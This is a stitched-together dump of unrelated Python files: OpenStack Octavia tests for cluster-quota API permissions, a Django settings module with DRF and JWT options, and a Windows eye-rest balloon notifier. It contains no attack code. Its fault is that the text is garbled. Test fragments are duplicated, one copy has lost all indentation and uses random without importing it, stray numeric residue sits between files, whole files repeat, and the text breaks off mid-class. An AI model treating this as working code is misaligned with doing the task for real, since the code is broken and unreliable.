        # default rather than being stored as "unset".
        body = self._full_clusterquota_body()
        body['clusterquota']['max_listeners_per_loadbalancer'] = None
        expected = self._full_clusterquota_body()['clusterquota']
        expected['max_listeners_per_loadbalancer'] = (
            CONF.clusterquotas.max_listeners_per_loadbalancer)
        self.put(self.CLUSTERQUOTAS_PATH, body, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=expected)

    def test_custom_missing_clusterquotas(self):
        # A field omitted from the request body keeps the configured
        # default, same as passing None.
        body = self._full_clusterquota_body()
        del body['clusterquota']['max_listeners_per_loadbalancer']
        expected = self._full_clusterquota_body()['clusterquota']
        expected['max_listeners_per_loadbalancer'] = (
            CONF.clusterquotas.max_listeners_per_loadbalancer)
        self.put(self.CLUSTERQUOTAS_PATH, body, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=expected)

    def test_delete_custom_clusterquotas(self):
        body = self._full_clusterquota_body()
        self.put(self.CLUSTERQUOTAS_PATH, body, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=body['clusterquota'])
        # Deleting reverts the quotas to the configured defaults.
        self.delete(self.CLUSTERQUOTAS_PATH, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'])

    def test_delete_custom_clusterquotas_admin(self):
        body = self._full_clusterquota_body()
        self.put(self.CLUSTERQUOTAS_PATH, body, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=body['clusterquota'])
        self._request_as(self.project_id, ['load-balancer_admin'],
                         self.delete, self.CLUSTERQUOTAS_PATH, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'])

    def test_delete_clusterquotas_not_Authorized_member(self):
        body = self._full_clusterquota_body()
        self.put(self.CLUSTERQUOTAS_PATH, body, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=body['clusterquota'])
        self._request_as(self.project_id, ['load-balancer_member'],
                         self.delete, self.CLUSTERQUOTAS_PATH, status=403)
        # The rejected delete must leave the custom quotas in place.
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=body['clusterquota'])
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
CONF = cfg.CONF
class TestClusterQuotas(base.BaseAPITest):
root_tag = 'clusterquota'
def setUp(self):
super(TestClusterQuotas, self).setUp()
conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
conf.config(
group="clusterquotas",
cluster_total_loadbalancers=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_healthmonitors_per_pool=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_listeners_per_loadbalancer=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
# We need to make sure unlimited gets tested each pass
conf.config(
group="clusterquotas",
max_members_per_pool=constants.QUOTA_UNLIMITED)
conf.config(
group="clusterquotas",
max_pools_per_loadbalancer=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_l7policies_per_listener=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_l7rules_per_l7policy=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
def _assert_clusterquotas_equal(self, observed, expected=None):
if not expected:
expected = {'cluster_total_loadbalancers':
CONF.clusterquotas.cluster_total_loadbalancers,
'max_healthmonitors_per_pool':
CONF.clusterquotas.max_healthmonitors_per_pool,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool':
CONF.clusterquotas.max_members_per_pool,
'max_pools_per_loadbalancer':
CONF.clusterquotas.max_pools_per_loadbalancer,
'max_l7policies_per_listener':
CONF.clusterquotas.max_l7policies_per_listener,
'max_l7rules_per_l7policy':
CONF.clusterquotas.max_l7rules_per_l7policy}
self.assertEqual(expected['cluster_total_loadbalancers'],
observed['cluster_total_loadbalancers'])
self.assertEqual(expected['max_healthmonitors_per_pool'],
observed['max_healthmonitors_per_pool'])
self.assertEqual(expected['max_listeners_per_loadbalancer'],
observed['max_listeners_per_loadbalancer'])
self.assertEqual(expected['max_members_per_pool'],
observed['max_members_per_pool'])
self.assertEqual(expected['max_pools_per_loadbalancer'],
observed['max_pools_per_loadbalancer'])
self.assertEqual(expected['max_l7policies_per_listener'],
observed['max_l7policies_per_listener'])
self.assertEqual(expected['max_l7rules_per_l7policy'],
observed['max_l7rules_per_l7policy'])
def test_get(self):
clusterquota1 = self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH
).json.get(self.root_tag)
self._assert_clusterquotas_equal(clusterquotas, clusterquota1)
def test_get_Authorized_admin(self):
self._test_get_Authorized('load-balancer_admin')
def _test_get_Authorized(self, role):
project1_id = uuidutils.generate_uuid()
clusterquota1 = self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [role],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH
).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self._assert_clusterquotas_equal(clusterquotas, clusterquota1)
def test_get_not_Authorized(self):
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
clusterquotas = self.get(self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_not_Authorized_bogus_role(self):
project1_id = uuidutils.generate_uuid()
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer:bogus'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_not_Authorized_no_role(self):
project1_id = uuidutils.generate_uuid()
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_default_clusterquotas(self):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_get_default_clusterquotas_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_default_clusterquotas_not_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH,
status=403)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_custom_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
def test_custom_clusterquotas_admin(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.put(clusterquota_path, body, status=202)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
def test_custom_clusterquotas_not_Authorized_member(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(clusterquota_path, body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_custom_partial_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': None,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
expected_body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=expected_body['clusterquota']
)
def test_custom_missing_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
expected_body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=expected_body['clusterquota']
)
def test_delete_custom_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
self.delete(clusterquota_path, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
    def test_delete_custom_clusterquotas_admin(self):
        """The load-balancer_admin role alone authorizes deleting cluster quotas."""
        clusterquota_path = self.CLUSTERQUOTAS_PATH
        body = {'clusterquota': {
            'cluster_total_loadbalancers': 30,
            'max_healthmonitors_per_pool': 30,
            'max_listeners_per_loadbalancer': 30,
            'max_members_per_pool': 30,
            'max_pools_per_loadbalancer': 30,
            'max_l7policies_per_listener': 30,
            'max_l7rules_per_l7policy': 30}}
        # Install custom quotas and verify they took effect.
        self.put(clusterquota_path, body, status=202)
        response = self.get(clusterquota_path)
        clusterquota_dict = response.json
        self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
                                         expected=body['clusterquota'])
        # Enable real auth so the policy engine evaluates the credentials.
        self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
        auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
        self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
        with mock.patch.object(octavia.common.context.Context, 'project_id',
                               self.project_id):
            # is_admin stays False: the role, not the admin flag, must grant
            # the DELETE.
            override_credentials = {
                'service_user_id': None,
                'user_domain_id': None,
                'is_admin_project': True,
                'service_project_domain_id': None,
                'service_project_id': None,
                'roles': ['load-balancer_admin'],
                'user_id': None,
                'is_admin': False,
                'service_user_domain_id': None,
                'project_domain_id': None,
                'service_roles': [],
                'project_id': self.project_id}
            with mock.patch(
                    "oslo_context.context.RequestContext.to_policy_values",
                    return_value=override_credentials):
                self.delete(clusterquota_path, status=202)
        self.conf.config(group='api_settings', auth_strategy=auth_strategy)
        # After deletion the quotas must be back to the configured defaults.
        response = self.get(clusterquota_path)
        clusterquota_dict = response.json
        self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_delete_clusterquotas_not_Authorized_member(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(clusterquota_path, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota']) | 0.378689 | 0.189634 |
import os
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# BASE_DIR resolves two directories above this file (the backend root).
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
# NOTE(review): SECRET_KEY, DEBUG, ALLOWED_HOSTS and DATABASES are not set
# here - presumably provided by an environment-specific settings module that
# imports this base; confirm before deploying.
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    # Project apps.
    'authentication',
    'main',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'core.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/djsta/'
# collectstatic target directory.
STATIC_ROOT = os.path.join(BASE_DIR, "static")
# The compiled frontend bundle is served as additional static files.
STATICFILES_DIRS = [os.path.join(
    BASE_DIR, "front_build")]
# Tell Django about the custom `User` model we created. The string
# `authentication.User` tells Django we are referring to the `User` model in
# the `authentication` module. This module is registered above in a setting
# called `INSTALLED_APPS`.
AUTH_USER_MODEL = 'authentication.User'
# DRF: authentication is required by default; JWT is tried first, then the
# session/token/basic schemes.
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': (
        'rest_framework.permissions.IsAuthenticated',
    ),
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework_simplejwt.authentication.JWTAuthentication',
        'rest_framework.authentication.SessionAuthentication',
        'rest_framework.authentication.TokenAuthentication',
        'rest_framework.authentication.BasicAuthentication',
    ),
}
# JWT behaviour for djangorestframework-simplejwt: short-lived access tokens
# paired with a four-hour refresh token.
# Fix: dataset-dump residue fused onto the closing brace line made this
# assignment a syntax error; the residue is removed.
SIMPLE_JWT = {
    'ACCESS_TOKEN_LIFETIME': timedelta(minutes=30),
    'REFRESH_TOKEN_LIFETIME': timedelta(hours=4),
    # Clients must send "Authorization: Bearer <token>".
    'AUTH_HEADER_TYPES': ('Bearer',),
    'USER_ID_FIELD': 'id',
    'USER_ID_CLAIM': 'user_id',
    'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
    'TOKEN_TYPE_CLAIM': 'token_type',
}
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# BASE_DIR resolves two directories above this file (the backend root).
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
# NOTE(review): SECRET_KEY, DEBUG, ALLOWED_HOSTS and DATABASES are not set
# here - presumably provided by an environment-specific settings module that
# imports this base; confirm before deploying.
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    # Project apps.
    'authentication',
    'main',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'core.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/djsta/'
# collectstatic target directory.
STATIC_ROOT = os.path.join(BASE_DIR, "static")
# The compiled frontend bundle is served as additional static files.
STATICFILES_DIRS = [os.path.join(
    BASE_DIR, "front_build")]
# Tell Django about the custom `User` model we created. The string
# `authentication.User` tells Django we are referring to the `User` model in
# the `authentication` module. This module is registered above in a setting
# called `INSTALLED_APPS`.
AUTH_USER_MODEL = 'authentication.User'
# DRF: authentication is required by default; JWT is tried first, then the
# session/token/basic schemes.
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': (
        'rest_framework.permissions.IsAuthenticated',
    ),
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework_simplejwt.authentication.JWTAuthentication',
        'rest_framework.authentication.SessionAuthentication',
        'rest_framework.authentication.TokenAuthentication',
        'rest_framework.authentication.BasicAuthentication',
    ),
}
# JWT behaviour for djangorestframework-simplejwt: short-lived access tokens
# paired with a four-hour refresh token.
# Fix: dataset-dump residue fused onto the closing brace line made this
# assignment a syntax error; the residue is removed.
SIMPLE_JWT = {
    'ACCESS_TOKEN_LIFETIME': timedelta(minutes=30),
    'REFRESH_TOKEN_LIFETIME': timedelta(hours=4),
    # Clients must send "Authorization: Bearer <token>".
    'AUTH_HEADER_TYPES': ('Bearer',),
    'USER_ID_FIELD': 'id',
    'USER_ID_CLAIM': 'user_id',
    'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
    'TOKEN_TYPE_CLAIM': 'token_type',
}
from win32api import *
from win32gui import *
import win32con
import sys, os
import time
from random import randint
class WindowsBalloonTip:
    """Show a Windows taskbar balloon notification for about five seconds.

    Constructing an instance registers a hidden window class, creates the
    window, attaches a tray icon, pops the balloon, sleeps, then destroys
    the window (which removes the tray icon via OnDestroy).
    """

    def __init__(self, title, msg):
        # Route WM_DESTROY to our handler so the tray icon gets removed.
        message_map = {
            win32con.WM_DESTROY: self.OnDestroy,
        }
        # Register the Window class.
        # NOTE(review): RegisterClass raises if "PythonTaskbar" is already
        # registered, so constructing this class twice in one process will
        # fail - confirm single-shot usage is intended.
        wc = WNDCLASS()
        hinst = wc.hInstance = GetModuleHandle(None)
        wc.lpszClassName = "PythonTaskbar"
        # Could also specify a wndproc.
        wc.lpfnWndProc = message_map
        class_atom = RegisterClass(wc)
        # Create the Window.
        style = win32con.WS_OVERLAPPED | win32con.WS_SYSMENU
        self.hwnd = CreateWindow(
            class_atom,
            "Taskbar",
            style,
            0, 0,
            win32con.CW_USEDEFAULT,
            win32con.CW_USEDEFAULT,
            0, 0,
            hinst,
            None
        )
        UpdateWindow(self.hwnd)
        # Load the custom icon sitting next to the script; fall back to the
        # stock application icon if it cannot be loaded.
        icon_path_name = os.path.abspath(os.path.join( sys.path[0], "Googleeyes.ico" ))
        icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
        try:
            hicon = LoadImage( hinst, icon_path_name, win32con.IMAGE_ICON, 0, 0, icon_flags )
        except Exception as e:
            hicon = LoadIcon( 0, win32con.IDI_APPLICATION )
        # Add the tray icon first, then switch it to balloon (NIF_INFO) mode
        # with the caller's title and message.
        flags = NIF_ICON | NIF_MESSAGE | NIF_TIP
        nid = (self.hwnd, 0, flags, win32con.WM_USER+20, hicon, "tooltip")
        Shell_NotifyIcon(NIM_ADD, nid)
        Shell_NotifyIcon(NIM_MODIFY, (
            self.hwnd,
            0,
            NIF_INFO,
            win32con.WM_USER + 20,
            hicon,
            "Balloon tooltip",
            msg,
            200,  # timeout hint (ms); modern Windows largely ignores it
            title,
            NIIF_NOSOUND
        )
        )
        # self.show_balloon(title, msg)
        # Keep the window alive long enough for the balloon to be seen.
        time.sleep(5)
        DestroyWindow(self.hwnd)

    def OnDestroy(self, hwnd, msg, wparam, lparam):
        # Remove the tray icon before the window goes away.
        nid = (self.hwnd, 0)
        Shell_NotifyIcon(NIM_DELETE, nid)
        # Terminate the app.
        PostQuitMessage(0)
def balloon_tip(title, msg):
    # Convenience wrapper: constructing WindowsBalloonTip shows the balloon,
    # blocks ~5 seconds, then tears the window down.
    WindowsBalloonTip(title, msg)
if __name__ == '__main__':
    # Fix: dataset-dump residue fused onto the final line made it a syntax
    # error; the residue is removed. Behaviour is otherwise unchanged: pick
    # one nagging reminder at random and show it as a balloon tip.
    messages = [
        "The time has come when I will have to ask you to move your eyes as constantly staring at your screen would harm them!",
        "It's been 15 minutes!! How could you still be looking at your screen!!",
        "See, Let me shout you this again. MOVE YOUR EYES! STOP STARING AT YOUR SCREEN.",
        "This is the time when you should give your eyes some rest."
    ]
    balloon_tip("Hey! You studious nerd!", messages[randint(0, len(messages) - 1)])
from win32gui import *
import win32con
import sys, os
import time
from random import randint
class WindowsBalloonTip:
    """Show a Windows taskbar balloon notification for about five seconds.

    Constructing an instance registers a hidden window class, creates the
    window, attaches a tray icon, pops the balloon, sleeps, then destroys
    the window (which removes the tray icon via OnDestroy).
    """

    def __init__(self, title, msg):
        # Route WM_DESTROY to our handler so the tray icon gets removed.
        message_map = {
